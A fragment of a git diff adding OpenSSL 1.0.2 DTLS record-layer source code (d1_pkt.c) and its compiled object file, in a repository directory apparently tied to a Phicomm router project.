+        /* XDTLS: check that epoch is consistent */
+        if ((rr->length != ccs_hdr_len) ||
+            (rr->off != 0) || (rr->data[0] != SSL3_MT_CCS)) {
+            i = SSL_AD_ILLEGAL_PARAMETER;
+            SSLerr(SSL_F_DTLS1_READ_BYTES, SSL_R_BAD_CHANGE_CIPHER_SPEC);
+            goto err;
+        }
+
+        rr->length = 0;
+
+        if (s->msg_callback)
+            s->msg_callback(0, s->version, SSL3_RT_CHANGE_CIPHER_SPEC,
+                            rr->data, 1, s, s->msg_callback_arg);
+
+        /*
+         * We can't process a CCS now, because previous handshake messages
+         * are still missing, so just drop it.
+         */
+        if (!s->d1->change_cipher_spec_ok) {
+            goto start;
+        }
+
+        s->d1->change_cipher_spec_ok = 0;
+
+        s->s3->change_cipher_spec = 1;
+        if (!ssl3_do_change_cipher_spec(s))
+            goto err;
+
+        /* do this whenever CCS is processed */
+        dtls1_reset_seq_numbers(s, SSL3_CC_READ);
+
+        if (s->version == DTLS1_BAD_VER)
+            s->d1->handshake_read_seq++;
+
+#ifndef OPENSSL_NO_SCTP
+        /*
+         * Remember that a CCS has been received, so that an old key of
+         * SCTP-Auth can be deleted when a CCS is sent. Will be ignored if no
+         * SCTP is used
+         */
+        BIO_ctrl(SSL_get_wbio(s), BIO_CTRL_DGRAM_SCTP_AUTH_CCS_RCVD, 1, NULL);
+#endif
+
+        goto start;
+    }
+
+    /*
+     * Unexpected handshake message (Client Hello, or protocol violation)
+     */
+    if ((s->d1->handshake_fragment_len >= DTLS1_HM_HEADER_LENGTH) &&
+        !s->in_handshake) {
+        struct hm_header_st msg_hdr;
+
+        /* this may just be a stale retransmit */
+        dtls1_get_message_header(rr->data, &msg_hdr);
+        if (rr->epoch != s->d1->r_epoch) {
+            rr->length = 0;
+            goto start;
+        }
+
+        /*
+         * If we are server, we may have a repeated FINISHED of the client
+         * here, then retransmit our CCS and FINISHED.
+         */
+        if (msg_hdr.type == SSL3_MT_FINISHED) {
+            if (dtls1_check_timeout_num(s) < 0)
+                return -1;
+
+            dtls1_retransmit_buffered_messages(s);
+            rr->length = 0;
+            goto start;
+        }
+
+        if (((s->state & SSL_ST_MASK) == SSL_ST_OK) &&
+            !(s->s3->flags & SSL3_FLAGS_NO_RENEGOTIATE_CIPHERS)) {
+#if 0                           /* worked only because C operator preferences
+                                 * are not as expected (and because this is
+                                 * not really needed for clients except for
+                                 * detecting protocol violations): */
+            s->state = SSL_ST_BEFORE | (s->server)
+                ? SSL_ST_ACCEPT : SSL_ST_CONNECT;
+#else
+            s->state = s->server ? SSL_ST_ACCEPT : SSL_ST_CONNECT;
+#endif
+            s->renegotiate = 1;
+            s->new_session = 1;
+        }
+        i = s->handshake_func(s);
+        if (i < 0)
+            return (i);
+        if (i == 0) {
+            SSLerr(SSL_F_DTLS1_READ_BYTES, SSL_R_SSL_HANDSHAKE_FAILURE);
+            return (-1);
+        }
+
+        if (!(s->mode & SSL_MODE_AUTO_RETRY)) {
+            if (s->s3->rbuf.left == 0) { /* no read-ahead left? */
+                BIO *bio;
+                /*
+                 * In the case where we try to read application data, but we
+                 * trigger an SSL handshake, we return -1 with the retry
+                 * option set.  Otherwise renegotiation may cause nasty
+                 * problems in the blocking world
+                 */
+                s->rwstate = SSL_READING;
+                bio = SSL_get_rbio(s);
+                BIO_clear_retry_flags(bio);
+                BIO_set_retry_read(bio);
+                return (-1);
+            }
+        }
+        goto start;
+    }
+
+    switch (rr->type) {
+    default:
+#ifndef OPENSSL_NO_TLS
+        /* TLS just ignores unknown message types */
+        if (s->version == TLS1_VERSION) {
+            rr->length = 0;
+            goto start;
+        }
+#endif
+        al = SSL_AD_UNEXPECTED_MESSAGE;
+        SSLerr(SSL_F_DTLS1_READ_BYTES, SSL_R_UNEXPECTED_RECORD);
+        goto f_err;
+    case SSL3_RT_CHANGE_CIPHER_SPEC:
+    case SSL3_RT_ALERT:
+    case SSL3_RT_HANDSHAKE:
+        /*
+         * we already handled all of these, with the possible exception of
+         * SSL3_RT_HANDSHAKE when s->in_handshake is set, but that should not
+         * happen when type != rr->type
+         */
+        al = SSL_AD_UNEXPECTED_MESSAGE;
+        SSLerr(SSL_F_DTLS1_READ_BYTES, ERR_R_INTERNAL_ERROR);
+        goto f_err;
+    case SSL3_RT_APPLICATION_DATA:
+        /*
+         * At this point, we were expecting handshake data, but have
+         * application data.  If the library was running inside ssl3_read()
+         * (i.e. in_read_app_data is set) and it makes sense to read
+         * application data at this point (session renegotiation not yet
+         * started), we will indulge it.
+         */
+        if (s->s3->in_read_app_data &&
+            (s->s3->total_renegotiations != 0) &&
+            (((s->state & SSL_ST_CONNECT) &&
+              (s->state >= SSL3_ST_CW_CLNT_HELLO_A) &&
+              (s->state <= SSL3_ST_CR_SRVR_HELLO_A)
+             ) || ((s->state & SSL_ST_ACCEPT) &&
+                   (s->state <= SSL3_ST_SW_HELLO_REQ_A) &&
+                   (s->state >= SSL3_ST_SR_CLNT_HELLO_A)
+             )
+            )) {
+            s->s3->in_read_app_data = 2;
+            return (-1);
+        } else {
+            al = SSL_AD_UNEXPECTED_MESSAGE;
+            SSLerr(SSL_F_DTLS1_READ_BYTES, SSL_R_UNEXPECTED_RECORD);
+            goto f_err;
+        }
+    }
+    /* not reached */
+
+ f_err:
+    ssl3_send_alert(s, SSL3_AL_FATAL, al);
+ err:
+    return (-1);
+}
+
+int dtls1_write_app_data_bytes(SSL *s, int type, const void *buf_, int len)
+{
+    int i;
+
+#ifndef OPENSSL_NO_SCTP
+    /*
+     * Check if we have to continue an interrupted handshake for reading
+     * belated app data with SCTP.
+     */
+    if ((SSL_in_init(s) && !s->in_handshake) ||
+        (BIO_dgram_is_sctp(SSL_get_wbio(s)) &&
+         (s->state == DTLS1_SCTP_ST_SR_READ_SOCK
+          || s->state == DTLS1_SCTP_ST_CR_READ_SOCK)))
+#else
+    if (SSL_in_init(s) && !s->in_handshake)
+#endif
+    {
+        i = s->handshake_func(s);
+        if (i < 0)
+            return (i);
+        if (i == 0) {
+            SSLerr(SSL_F_DTLS1_WRITE_APP_DATA_BYTES,
+                   SSL_R_SSL_HANDSHAKE_FAILURE);
+            return -1;
+        }
+    }
+
+    if (len > SSL3_RT_MAX_PLAIN_LENGTH) {
+        SSLerr(SSL_F_DTLS1_WRITE_APP_DATA_BYTES, SSL_R_DTLS_MESSAGE_TOO_BIG);
+        return -1;
+    }
+
+    i = dtls1_write_bytes(s, type, buf_, len);
+    return i;
+}
+
+        /*
+         * this only happens when a client hello is received and a handshake
+         * is started.
+         */
+static int
+have_handshake_fragment(SSL *s, int type, unsigned char *buf,
+                        int len, int peek)
+{
+
+    if ((type == SSL3_RT_HANDSHAKE) && (s->d1->handshake_fragment_len > 0))
+        /* (partially) satisfy request from storage */
+    {
+        unsigned char *src = s->d1->handshake_fragment;
+        unsigned char *dst = buf;
+        unsigned int k, n;
+
+        /* peek == 0 */
+        n = 0;
+        while ((len > 0) && (s->d1->handshake_fragment_len > 0)) {
+            *dst++ = *src++;
+            len--;
+            s->d1->handshake_fragment_len--;
+            n++;
+        }
+        /* move any remaining fragment bytes: */
+        for (k = 0; k < s->d1->handshake_fragment_len; k++)
+            s->d1->handshake_fragment[k] = *src++;
+        return n;
+    }
+
+    return 0;
+}
+
+/*
+ * Call this to write data in records of type 'type' It will return <= 0 if
+ * not all data has been sent or non-blocking IO.
+ */
+int dtls1_write_bytes(SSL *s, int type, const void *buf, int len)
+{
+    int i;
+
+    OPENSSL_assert(len <= SSL3_RT_MAX_PLAIN_LENGTH);
+    s->rwstate = SSL_NOTHING;
+    i = do_dtls1_write(s, type, buf, len, 0);
+    return i;
+}
+
+int do_dtls1_write(SSL *s, int type, const unsigned char *buf,
+                   unsigned int len, int create_empty_fragment)
+{
+    unsigned char *p, *pseq;
+    int i, mac_size, clear = 0;
+    int prefix_len = 0;
+    int eivlen;
+    SSL3_RECORD *wr;
+    SSL3_BUFFER *wb;
+    SSL_SESSION *sess;
+
+    /*
+     * first check if there is a SSL3_BUFFER still being written out.  This
+     * will happen with non blocking IO
+     */
+    if (s->s3->wbuf.left != 0) {
+        OPENSSL_assert(0);      /* XDTLS: want to see if we ever get here */
+        return (ssl3_write_pending(s, type, buf, len));
+    }
+
+    /* If we have an alert to send, lets send it */
+    if (s->s3->alert_dispatch) {
+        i = s->method->ssl_dispatch_alert(s);
+        if (i <= 0)
+            return (i);
+        /* if it went, fall through and send more stuff */
+    }
+
+    if (len == 0 && !create_empty_fragment)
+        return 0;
+
+    wr = &(s->s3->wrec);
+    wb = &(s->s3->wbuf);
+    sess = s->session;
+
+    if ((sess == NULL) ||
+        (s->enc_write_ctx == NULL) || (EVP_MD_CTX_md(s->write_hash) == NULL))
+        clear = 1;
+
+    if (clear)
+        mac_size = 0;
+    else {
+        mac_size = EVP_MD_CTX_size(s->write_hash);
+        if (mac_size < 0)
+            goto err;
+    }
+
+    /* DTLS implements explicit IV, so no need for empty fragments */
+#if 0
+    /*
+     * 'create_empty_fragment' is true only when this function calls itself
+     */
+    if (!clear && !create_empty_fragment && !s->s3->empty_fragment_done
+        && SSL_version(s) != DTLS1_VERSION && SSL_version(s) != DTLS1_BAD_VER)
+    {
+        /*
+         * countermeasure against known-IV weakness in CBC ciphersuites (see
+         * http://www.openssl.org/~bodo/tls-cbc.txt)
+         */
+
+        if (s->s3->need_empty_fragments && type == SSL3_RT_APPLICATION_DATA) {
+            /*
+             * recursive function call with 'create_empty_fragment' set; this
+             * prepares and buffers the data for an empty fragment (these
+             * 'prefix_len' bytes are sent out later together with the actual
+             * payload)
+             */
+            prefix_len = s->method->do_ssl_write(s, type, buf, 0, 1);
+            if (prefix_len <= 0)
+                goto err;
+
+            if (s->s3->wbuf.len <
+                (size_t)prefix_len + SSL3_RT_MAX_PACKET_SIZE) {
+                /* insufficient space */
+                SSLerr(SSL_F_DO_DTLS1_WRITE, ERR_R_INTERNAL_ERROR);
+                goto err;
+            }
+        }
+
+        s->s3->empty_fragment_done = 1;
+    }
+#endif
+    p = wb->buf + prefix_len;
+
+    /* write the header */
+
+    *(p++) = type & 0xff;
+    wr->type = type;
+    /*
+     * Special case: for hello verify request, client version 1.0 and we
+     * haven't decided which version to use yet send back using version 1.0
+     * header: otherwise some clients will ignore it.
+     */
+    if (s->method->version == DTLS_ANY_VERSION) {
+        *(p++) = DTLS1_VERSION >> 8;
+        *(p++) = DTLS1_VERSION & 0xff;
+    } else {
+        *(p++) = s->version >> 8;
+        *(p++) = s->version & 0xff;
+    }
+
+    /* field where we are to write out packet epoch, seq num and len */
+    pseq = p;
+    p += 10;
+
+    /* Explicit IV length, block ciphers appropriate version flag */
+    if (s->enc_write_ctx) {
+        int mode = EVP_CIPHER_CTX_mode(s->enc_write_ctx);
+        if (mode == EVP_CIPH_CBC_MODE) {
+            eivlen = EVP_CIPHER_CTX_iv_length(s->enc_write_ctx);
+            if (eivlen <= 1)
+                eivlen = 0;
+        }
+        /* Need explicit part of IV for GCM mode */
+        else if (mode == EVP_CIPH_GCM_MODE)
+            eivlen = EVP_GCM_TLS_EXPLICIT_IV_LEN;
+        else
+            eivlen = 0;
+    } else
+        eivlen = 0;
+
+    /* lets setup the record stuff. */
+    wr->data = p + eivlen;      /* make room for IV in case of CBC */
+    wr->length = (int)len;
+    wr->input = (unsigned char *)buf;
+
+    /*
+     * we now 'read' from wr->input, wr->length bytes into wr->data
+     */
+
+    /* first we compress */
+    if (s->compress != NULL) {
+        if (!ssl3_do_compress(s)) {
+            SSLerr(SSL_F_DO_DTLS1_WRITE, SSL_R_COMPRESSION_FAILURE);
+            goto err;
+        }
+    } else {
+        memcpy(wr->data, wr->input, wr->length);
+        wr->input = wr->data;
+    }
+
+    /*
+     * we should still have the output to wr->data and the input from
+     * wr->input.  Length should be wr->length. wr->data still points in the
+     * wb->buf
+     */
+
+    if (mac_size != 0) {
+        if (s->method->ssl3_enc->mac(s, &(p[wr->length + eivlen]), 1) < 0)
+            goto err;
+        wr->length += mac_size;
+    }
+
+    /* this is true regardless of mac size */
+    wr->input = p;
+    wr->data = p;
+
+    if (eivlen)
+        wr->length += eivlen;
+
+    if (s->method->ssl3_enc->enc(s, 1) < 1)
+        goto err;
+
+    /* record length after mac and block padding */
+    /*
+     * if (type == SSL3_RT_APPLICATION_DATA || (type == SSL3_RT_ALERT && !
+     * SSL_in_init(s)))
+     */
+
+    /* there's only one epoch between handshake and app data */
+
+    s2n(s->d1->w_epoch, pseq);
+
+    /* XDTLS: ?? */
+    /*
+     * else s2n(s->d1->handshake_epoch, pseq);
+     */
+
+    memcpy(pseq, &(s->s3->write_sequence[2]), 6);
+    pseq += 6;
+    s2n(wr->length, pseq);
+
+    if (s->msg_callback)
+        s->msg_callback(1, 0, SSL3_RT_HEADER, pseq - DTLS1_RT_HEADER_LENGTH,
+                        DTLS1_RT_HEADER_LENGTH, s, s->msg_callback_arg);
+
+    /*
+     * we should now have wr->data pointing to the encrypted data, which is
+     * wr->length long
+     */
+    wr->type = type;            /* not needed but helps for debugging */
+    wr->length += DTLS1_RT_HEADER_LENGTH;
+
+#if 0                           /* this is now done at the message layer */
+    /* buffer the record, making it easy to handle retransmits */
+    if (type == SSL3_RT_HANDSHAKE || type == SSL3_RT_CHANGE_CIPHER_SPEC)
+        dtls1_buffer_record(s, wr->data, wr->length,
+                            *((PQ_64BIT *) & (s->s3->write_sequence[0])));
+#endif
+
+    ssl3_record_sequence_update(&(s->s3->write_sequence[0]));
+
+    if (create_empty_fragment) {
+        /*
+         * we are in a recursive call; just return the length, don't write
+         * out anything here
+         */
+        return wr->length;
+    }
+
+    /* now let's set up wb */
+    wb->left = prefix_len + wr->length;
+    wb->offset = 0;
+
+    /*
+     * memorize arguments so that ssl3_write_pending can detect bad write
+     * retries later
+     */
+    s->s3->wpend_tot = len;
+    s->s3->wpend_buf = buf;
+    s->s3->wpend_type = type;
+    s->s3->wpend_ret = len;
+
+    /* we now just need to write the buffer */
+    return ssl3_write_pending(s, type, buf, len);
+ err:
+    return -1;
+}
+
+static int dtls1_record_replay_check(SSL *s, DTLS1_BITMAP *bitmap)
+{
+    int cmp;
+    unsigned int shift;
+    const unsigned char *seq = s->s3->read_sequence;
+
+    cmp = satsub64be(seq, bitmap->max_seq_num);
+    if (cmp > 0) {
+        memcpy(s->s3->rrec.seq_num, seq, 8);
+        return 1;               /* this record in new */
+    }
+    shift = -cmp;
+    if (shift >= sizeof(bitmap->map) * 8)
+        return 0;               /* stale, outside the window */
+    else if (bitmap->map & (1UL << shift))
+        return 0;               /* record previously received */
+
+    memcpy(s->s3->rrec.seq_num, seq, 8);
+    return 1;
+}
+
+static void dtls1_record_bitmap_update(SSL *s, DTLS1_BITMAP *bitmap)
+{
+    int cmp;
+    unsigned int shift;
+    const unsigned char *seq = s->s3->read_sequence;
+
+    cmp = satsub64be(seq, bitmap->max_seq_num);
+    if (cmp > 0) {
+        shift = cmp;
+        if (shift < sizeof(bitmap->map) * 8)
+            bitmap->map <<= shift, bitmap->map |= 1UL;
+        else
+            bitmap->map = 1UL;
+        memcpy(bitmap->max_seq_num, seq, 8);
+    } else {
+        shift = -cmp;
+        if (shift < sizeof(bitmap->map) * 8)
+            bitmap->map |= 1UL << shift;
+    }
+}
+
+int dtls1_dispatch_alert(SSL *s)
+{
+    int i, j;
+    void (*cb) (const SSL *ssl, int type, int val) = NULL;
+    unsigned char buf[DTLS1_AL_HEADER_LENGTH];
+    unsigned char *ptr = &buf[0];
+
+    s->s3->alert_dispatch = 0;
+
+    memset(buf, 0x00, sizeof(buf));
+    *ptr++ = s->s3->send_alert[0];
+    *ptr++ = s->s3->send_alert[1];
+
+#ifdef DTLS1_AD_MISSING_HANDSHAKE_MESSAGE
+    if (s->s3->send_alert[1] == DTLS1_AD_MISSING_HANDSHAKE_MESSAGE) {
+        s2n(s->d1->handshake_read_seq, ptr);
+# if 0
+        if (s->d1->r_msg_hdr.frag_off == 0)
+            /*
+             * waiting for a new msg
+             */
+            else
+            s2n(s->d1->r_msg_hdr.seq, ptr); /* partial msg read */
+# endif
+
+# if 0
+        fprintf(stderr,
+                "s->d1->handshake_read_seq = %d, s->d1->r_msg_hdr.seq = %d\n",
+                s->d1->handshake_read_seq, s->d1->r_msg_hdr.seq);
+# endif
+        l2n3(s->d1->r_msg_hdr.frag_off, ptr);
+    }
+#endif
+
+    i = do_dtls1_write(s, SSL3_RT_ALERT, &buf[0], sizeof(buf), 0);
+    if (i <= 0) {
+        s->s3->alert_dispatch = 1;
+        /* fprintf( stderr, "not done with alert\n" ); */
+    } else {
+        if (s->s3->send_alert[0] == SSL3_AL_FATAL
+#ifdef DTLS1_AD_MISSING_HANDSHAKE_MESSAGE
+            || s->s3->send_alert[1] == DTLS1_AD_MISSING_HANDSHAKE_MESSAGE
+#endif
+            )
+            (void)BIO_flush(s->wbio);
+
+        if (s->msg_callback)
+            s->msg_callback(1, s->version, SSL3_RT_ALERT, s->s3->send_alert,
+                            2, s, s->msg_callback_arg);
+
+        if (s->info_callback != NULL)
+            cb = s->info_callback;
+        else if (s->ctx->info_callback != NULL)
+            cb = s->ctx->info_callback;
+
+        if (cb != NULL) {
+            j = (s->s3->send_alert[0] << 8) | s->s3->send_alert[1];
+            cb(s, SSL_CB_WRITE_ALERT, j);
+        }
+    }
+    return (i);
+}
+
+static DTLS1_BITMAP *dtls1_get_bitmap(SSL *s, SSL3_RECORD *rr,
+                                      unsigned int *is_next_epoch)
+{
+
+    *is_next_epoch = 0;
+
+    /* In current epoch, accept HM, CCS, DATA, & ALERT */
+    if (rr->epoch == s->d1->r_epoch)
+        return &s->d1->bitmap;
+
+    /* Only HM and ALERT messages can be from the next epoch */
+    else if (rr->epoch == (unsigned long)(s->d1->r_epoch + 1) &&
+             (rr->type == SSL3_RT_HANDSHAKE || rr->type == SSL3_RT_ALERT)) {
+        *is_next_epoch = 1;
+        return &s->d1->next_bitmap;
+    }
+
+    return NULL;
+}
+
+#if 0
+static int
+dtls1_record_needs_buffering(SSL *s, SSL3_RECORD *rr,
+                             unsigned short *priority, unsigned long *offset)
+{
+
+    /* alerts are passed up immediately */
+    if (rr->type == SSL3_RT_APPLICATION_DATA || rr->type == SSL3_RT_ALERT)
+        return 0;
+
+    /*
+     * Only need to buffer if a handshake is underway. (this implies that
+     * Hello Request and Client Hello are passed up immediately)
+     */
+    if (SSL_in_init(s)) {
+        unsigned char *data = rr->data;
+        /* need to extract the HM/CCS sequence number here */
+        if (rr->type == SSL3_RT_HANDSHAKE ||
+            rr->type == SSL3_RT_CHANGE_CIPHER_SPEC) {
+            unsigned short seq_num;
+            struct hm_header_st msg_hdr;
+            struct ccs_header_st ccs_hdr;
+
+            if (rr->type == SSL3_RT_HANDSHAKE) {
+                dtls1_get_message_header(data, &msg_hdr);
+                seq_num = msg_hdr.seq;
+                *offset = msg_hdr.frag_off;
+            } else {
+                dtls1_get_ccs_header(data, &ccs_hdr);
+                seq_num = ccs_hdr.seq;
+                *offset = 0;
+            }
+
+            /*
+             * this is either a record we're waiting for, or a retransmit of
+             * something we happened to previously receive (higher layers
+             * will drop the repeat silently
+             */
+            if (seq_num < s->d1->handshake_read_seq)
+                return 0;
+            if (rr->type == SSL3_RT_HANDSHAKE &&
+                seq_num == s->d1->handshake_read_seq &&
+                msg_hdr.frag_off < s->d1->r_msg_hdr.frag_off)
+                return 0;
+            else if (seq_num == s->d1->handshake_read_seq &&
+                     (rr->type == SSL3_RT_CHANGE_CIPHER_SPEC ||
+                      msg_hdr.frag_off == s->d1->r_msg_hdr.frag_off))
+                return 0;
+            else {
+                *priority = seq_num;
+                return 1;
+            }
+        } else                  /* unknown record type */
+            return 0;
+    }
+
+    return 0;
+}
+#endif
+
+void dtls1_reset_seq_numbers(SSL *s, int rw)
+{
+    unsigned char *seq;
+    unsigned int seq_bytes = sizeof(s->s3->read_sequence);
+
+    if (rw & SSL3_CC_READ) {
+        seq = s->s3->read_sequence;
+        s->d1->r_epoch++;
+        memcpy(&(s->d1->bitmap), &(s->d1->next_bitmap), sizeof(DTLS1_BITMAP));
+        memset(&(s->d1->next_bitmap), 0x00, sizeof(DTLS1_BITMAP));
+    } else {
+        seq = s->s3->write_sequence;
+        memcpy(s->d1->last_write_sequence, seq,
+               sizeof(s->s3->write_sequence));
+        s->d1->w_epoch++;
+    }
+
+    memset(seq, 0x00, seq_bytes);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/d1_pkt.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/d1_pkt.o
new file mode 100644
index 0000000000000000000000000000000000000000..d28cfb5f2a877ef73e16c60640fe1abdf42c982d
GIT binary patch
literal 13936
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
